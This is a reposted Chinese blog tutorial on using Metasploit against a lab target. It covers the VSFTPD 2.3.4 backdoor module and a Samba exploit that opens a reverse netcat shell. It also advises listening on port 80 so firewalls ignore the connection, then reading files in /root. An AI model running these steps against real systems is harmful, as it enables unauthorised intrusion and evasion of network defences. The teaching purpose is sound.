首页 > 其他 > 详细

8.FTP后门命令执行----Samba命令执行

时间:2019-08-04 11:34:55      阅读:77      评论:0      收藏:0      [点我收藏+]

FTP后门命令执行

再次声明,最近听闻不得教受工具使用等言论。

我敢打包票,网络空间安全一级学科的老师和学生是不会说这句话的。未知攻,焉知防。

有工具来检测自己和玩弄它,是幸运的。

犯罪者不会给你提供任何的漏洞利用工具让你玩弄。

他们的工具里面包含的漏洞是自己研发出来的。

因此,您所有看得见的工具都是用于安全的学习和培养安全性人才而使用的,是最低级别的技术。

如果这样的工具和教程都能够对公司和国家构成危害的话,那么犯罪者就更加的可以肆无忌惮的发布攻击。

我们的工具学习和掌握如同在学小学一年级,犯罪者使用的工具是大学级别。

工具都不让发布和用于教学,还谈什么国家安全,拿什么认知和技能去防御真正的攻击。

metasploit是rapid7开发的 www.rapid7.com
它是一个大型漏洞利用数据库,可以创造属于自己的漏洞
为了安全性检测,利用它和修补漏洞

parrot:msfconsole
help
use    show    set    exploit
谷歌 rapid7 进入 vulnerability & Exploit Database   查询 VSFTPD v2.3.4 Backdoor Command Execution
use 复制粘贴模块名字
show options
set RHOST 靶机IP
show options
exploit
uname -r    uname -a    ls

Samba命令执行

谷歌 rapid7 进入 vulnerability & Exploit Database 查询到zenmap对应的samba模块 获取模块的信息

samba服务器运行它没有后门
唯一的方式是利用缓冲区溢出,使用有效载荷

use 复制粘贴模块名字
options
set RHOST 靶机ip
clear
show payloads
选择 cmd/unix/reverse_netcat 复制
set payload 复制粘贴
options
设置自己的监听端口为80,靶机访问80端口防火墙会认为它在访问网站,让可疑程度降低
如果反向连接出来的端口是一个奇怪的数字,防火墙会阻止这个连接,说这个可疑
set LHOST 本机IP
exploit
uname -a    ls    cd /root    ls    cat vnc.log

8.FTP后门命令执行----Samba命令执行

原文:https://www.cnblogs.com/sec875/p/11297011.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!